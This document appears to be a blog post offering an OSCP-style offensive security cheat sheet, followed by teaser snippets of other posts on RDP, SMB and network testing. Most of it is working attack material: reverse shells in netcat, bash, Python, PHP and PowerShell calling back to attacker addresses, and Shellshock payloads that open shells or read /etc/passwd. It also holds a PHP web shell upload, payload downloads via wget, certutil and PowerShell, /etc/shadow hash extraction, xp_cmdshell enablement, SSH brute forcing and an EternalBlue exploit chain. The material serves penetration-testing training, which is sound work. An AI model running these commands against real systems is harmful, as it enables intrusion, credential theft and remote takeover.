Offensive Security Testing Guide


This cheat sheet is the compilation of commands we learnt to exploit the vulnerable machines.
The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP).
So... Try Harder!

Information Gathering

Operating System

Windows

Interesting Path 
"Documents and Settings"/Administrator/Desktop

file:///C:/xampp/readme_en.txt
file:///C:/xampp/passwords.txt
file:///C:/xampp/webdav/webdav.txt
file:///C:/xampp/apache/conf/extra/httpd-dav.conf
file:///C:/xampp/apache/conf/extra/httpd-xampp.conf
file:///C:/xampp/apache/logs/access.log
file:///C:/xampp/apache/logs/error.log
file:///C:/xampp/security/webdav.htpasswd
file:///C:/xampp/htdocs/dashboard/phpinfo.php
file:///C:/xampp/phpmyadmin/config.inc.php
file:///C:/xampp/php/logs/php_error_log
file:///C:/xampp/mysql/bin/my.ini

C:\Users\<User>\AppData\Local\Temp

#Email Address
C:\Users\<User>\AppData\Local\Microsoft\Outlook

Active Connection 
netstat -anob #Require elevation
netstat -ano #Without Elevation
tasklist

User or System Enumeration 
echo %username%

Shell to Meterpreter Upgrade 
use post/multi/manage/shell_to_meterpreter

Linux

Identify OS 
uname -a
cat /etc/lsb-release
Exploring Directories 
ls * 
ls -R <path> #lists directory tree recursively
ls -la * #list long format including hidden files
Identify Filetype 
file <filename>
File Compression/Decompression 
tar xvf <filename>
Retrieve Password Hashes 
cat /etc/shadow | grep '\$' | cut -d ':' -f -2
Execute Commands for 10 times 
for i in {1..10}; do whoami; done

Steganography

binwalk -e <picture_file>
exiftool <picture_file>
steghide extract -sf <picture_file>

Web Application Request Parameter

wfuzz -c -z file,burp-parameter-names.txt --hh=19 http://<target_URL>/<page>?FUZZ=test
Reference:
http://wfuzz.readthedocs.io/en/latest/user/basicusage.html#fuzzing-parameters-in-urls
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt

Web Application Directories

cewl <target URL> > wordlist.txt

Web Application Sensitive Page

Apache

/etc/apache2/sites-enabled/000-default.conf

WordPress 

/wp-config.php

Mail Server

POP3

USER <username>

PASS <password>


LIST #displays a summary of message


RETR <message_number> #retrieve a particular message

Hash & Encryption

Identify Hash

hash-identifier

Cracking Hash

hashcat64.exe --force -m 1400 -a 0 <hash_file> <dictionary_file>
john <hash_file> --format=mysql-sha1 --wordlist=<dictionary_file>
john <hash_file> --format=raw-sha1 --wordlist=<dictionary_file>
Tools
https://github.com/UltimateHackers/Hash-Buster

Dictionary Attack

SSH
hydra -L <user_dict> -P <pwd_dict> <victim_ip_addr> ssh

Cracking ZIP

fcrackzip -u -D -p <dictionary_file> <zip_file>

RSA Attack

RsaCtfTool.py --publickey <decoder.pub> --uncipher <pass.crypt>
Reference:
https://github.com/Ganapati/RsaCtfTool

Decode Base64

base64 -d <<< <based_64_encoded_value>

Convert Hexadecimal to Text

echo <hexadecimal_value> | xxd -r -p

Convert Decimal to Hexadecimal

python -c "print format(<decimal_value>, 'x').decode('hex')"

Thick Client Application

Executable File

strings <executable_file>

Disassemble Java Class File

javap -c <java_class>.class | tee <output_file>.txt


Connection Establish

Listener (Attacker)

nc -nvlp 8099
nc -nvlp 8099 -u #UDP

Request (Victim)

/bin/nc -e /bin/sh <target_ip_addr> 8099
nc -e /bin/bash <target_ip_addr> 8099
bash -i >& /dev/tcp/<target_ip_addr>/8099 0>&1

Reference:
Exploitation using Shell

SSH 

ssh -i <rsa_private_key_file>.key <user>@<target_IP_address>

SSH (IPv6) 

ssh -6 -i <rsa_private_key_file>.key <user>@<target_IP_address>

RDP 

rdesktop -u <username> -p <password> <target_ip_address>

Python

python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<listener_ip>',8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"

Database

MSSQL 

sqsh -S <target_IP_address> -U <username>

MySQL 

mysql -h <target_IP_address> -u <username> -p

Application

WebDav

cadaver http://<target_ip>/<webdav_path>/
put <webshell>

Shellshock

wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -c 'echo vulnerable'" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >& /dev/tcp/<listener_ip>/8099 0>&1" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" 'http://10.10.10.56/<target_ip_address>/<vulnerable>.sh'
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/<listener_ip>/8099 0>&1'" \http://<target_ip_address>/cgi-bin/<vulnerable>

Proxy

SSH

proxytunnel -p <victim_ip_addr>:<port> -d 127.0.0.1:22 -a 8099
ssh <user>@127.0.0.1 -p 8099 "/bin/sh"


File/Content Transfer

Linux

wget http://<attacker_ip>/<file> -O /<path>/<filename> 2>&1
wget --no-check-certificate https://<attacker_ip>/<file>
curl -O http://<attacker_ip>/<file> 2>&1
fetch -o <filename> http://<attacker_ip>/<file>

FTP

Set file transfer mode to BINARY (Used to transfer non-ASCII files) 
binary
To browse directories and retrieve file 
LIST C:\\<Directory Name>
RETR C:\\<Directory Name>\\<File Name>

Netcat

Victim 
nc <attacker_ip_address> 8099 < <file>.txt
Attacker
nc -lnvp 8099 > <file>.txt

HTTP PUT Method

curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://<target_ip_addr>/<path>/shell.php

NFS

cp /bin/bash /mnt/<share>
chmod 4777 bash
./bash -p

Powershell

C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe wget "http://<attacker_ip>/<file>" -outfile "<output_file_name>"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://<attacker_ip>/<file>', '<output_file_name>')"
powershell -command "Invoke-WebRequest 'http://<attacker_ip>/<file>' -OutFile '<output_file_name>'"

Certutil

certutil -urlcache -split -f http://<attacker_ip>/<file> <output_file_name>


Code Execution

Python

import subprocess
subprocess.check_output(['whoami'])
import os
import sys

os.system('nc -e /bin/bash <attacker_ip> 8099')

PHP

<?php passthru("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/f"); ?>

MS SQL

EXEC SP_CONFIGURE N'show advanced options', 1
go
EXEC SP_CONFIGURE N'xp_cmdshell', 1
go
RECONFIGURE
go
xp_cmdshell 'cd C:\<path_to_bind_shell>\ & <bind_shell_name>.exe';
go

Oracle iSQL* Plus

exec dbms_java.grant_permission( 'SYSTEM','SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');

begin
  dbms_java.grant_permission
      ('SYSTEM',
       'java.io.FilePermission',
       '<<ALL FILES>>',
       'execute');
  dbms_java.grant_permission
      ('SYSTEM',
       'java.lang.RuntimePermission',
       '*',
       'writeFileDescriptor' );
end;

exec javacmd('<command>');

Power Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.56.101',8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reference:
Reverse Shell Cheat Sheet | pentestmonkey


TTY Shell

Python

which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'

Perl

/usr/bin/perl -e 'exec "/bin/sh"'

VIM

:set shell=/bin/bash
:shell

AWK

awk 'BEGIN {system("/bin/sh")}'

Reference:
NETSEC - Spawning a TTY Shell
SANS Penetration Testing | Escaping Restricted Linux Shells


Buffer Overflow

Reference:
http://www.axcelsec.com/2018/05/buffer-overflow.html


Remote Code Execution (Windows)

MS17-010
nasm -f bin eternalblue_kshellcode_x86.asm
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o msf.bin EXITFUNC=thread LHOST=<Local IP> LPORT=8099
cat eternalblue_kshellcode_x86 msf.bin > sc_x86.bin
python eternalblue_exploit7.py <Target IP> shellcode/sc_x86.bin
Reference:
https://github.com/vivami/MS17-010

Post Exploitation

Reference:
https://www.axcelsec.com/2019/05/post-exploitation.html

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Image
Common Remote Desktop Protocol (RDP) Vulnerabilities Terminal Services Encryption Level is Medium or Low Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness Terminal Services Doesn't Use Network Level Authentication (NLA) Only Terminal Services Encryption Level is Medium or Low Vulnerability Assessment: Host Assessment: Remediation: Local Computer Policy/Computer Configuration/Administrative Templates/Windows Components/Remote Desktop Services/Remote Desktop Session Host/Security/Set client connection encryption level Set client connection encryption level to High Note: High: The High setting encrypts data sent from the client to the server and from the server to the client by using strong 128-bit encryption. Use this encryption level in environments that contain only 128-bit clients (for example, clients that run Remote Desktop Connection). Clients that do not support this encryption level cannot connect to RD Se
Read more

Penetration Testing - Network

Image
Manual Vulnerability Assessment TCP/21: FTP Anonymous FTP Enabled anonymous guest TCP/22: SSH nmap -p 22 --script ssh2-enum-algos <ip_address> SSH Weak Algorithms Supported SSH Server CBC Mode Ciphers Enabled ssh -oCiphers=<ciphers> <ip_address> SSH Weak MAC Algorithms Enabled ssh -oMACs=<algorithm> <ip_address> SSH Protocol v1 Supported ssh -1 <ip_address> -v Hardening on SSH Ciphers aes256-ctr,aes192-ctr,aes128-ctr MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com TCP/23: Telnet Unencrypted Telnet Server telnet <ip_address> 23 TCP/25: SMTP SMTP Service Cleartext Login Permitted telnet <ip_address> 25 EHLO <ip_address> AUTH LOGIN Mailserver answer to VRFY and EXPN requests * nc <ip_address> 25 EXPN root VRFY root TCP/53: DNS DNS Server Cache Snooping Remote Information Disclosure
Read more

Damn Vulnerable Web Services (DVWS) - Walkthrough

Image
Installation Damn Vulnerable Web Services  (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. https://github.com/snoopysecurity/dvws WSDL Enumeration Spider DVWS using Burp Suite and look for service.php Requests processed by SOAP service include  check_user_information ,  owasp_apitop10 ,  population  and  return_price XPATH Injection User Login: 1' or '1'='1 User Password: 1' or '1'='1 Command Injection Original Request parameter value of name is " find "   by default  Edited Request change the parameter value of  name  from "find" to " dir "   Cross Site Tracing (XST) Hint of " The NuSOAP Library service is vulnerable to a Cross-site scripting flaw " is given by DVWS. Exploit is published at exploit DB ( https://www.exploit-db.com/e
Read more

Server Message Block (SMB) Security

Image
Common SMB related vulnerabilities Microsoft Windows SMBv1 Multiple Vulnerabilities SMB Signing Disabled Microsoft Windows SMB NULL Session Authentication Microsoft Windows SMB Shares Unprivileged Access Network Discovery: TCP port 5357 - Web Services on Devices API (WSDAPI) File and Printer Sharing: TCP port 135 - Remote Procedure Call (RPC) TCP port 139 - NETBIOS Session Service TCP port 445 - Server Message Block (SMB) By disable NetBIOS over TCP/IP (TCP Port 139), NETBIOS name discovery will be prevented Microsoft Windows SMBv1 Multiple Vulnerabilities Vulnerability Assessment: NSE script smb-protocols can be used to check if the server supported NT LM 0.12 (SMBv1) . Host Assessment: Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath} Remediation: Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Read more

Host Configuration Assessment - Windows

Image
OS Information Gathering systeminfo wmic computersystem get domainrole 0 - Standalone workstation 1 - Member workstation 2 - Standalone server 3 - Member server 4 - Domain controller secedit /export /cfg cfg.ini > nul net user administrator > netuseradmin.txt auditpol.exe /get /category:* > auditpol.txt netsh advfirewall show allprofiles > firewall.txt net accounts > netaccount.txt gpresult /f /h evid/gporesult.html > nul accesschk /accepteula -q -a * > accesschk.txt *Simplify the process with Scgary ! User Right Assignment type cfg.ini | grep "^SeAuditPrivilege\|^SeCreatePagefilePrivilege\|^SeRemoteShutdownPrivilege\|^SeRemoteInteractiveLogonRight\|^SeEnableDelegationPrivilege\|^SeLockMemoryPrivilege\|^SeDenyNetworkLogonRight\|^SeChangeNotifyPrivilege\|^SeDebugPrivilege\|^SeDenyBatchLogonRight\|^SeCreateGlobalPrivilege\|^SeShutdownPrivilege\|^SeIncreaseQuotaPrivilege\|^SeTrustedCredManAccessPrivilege\|^SeDenyInteractiveLogonRight
Read more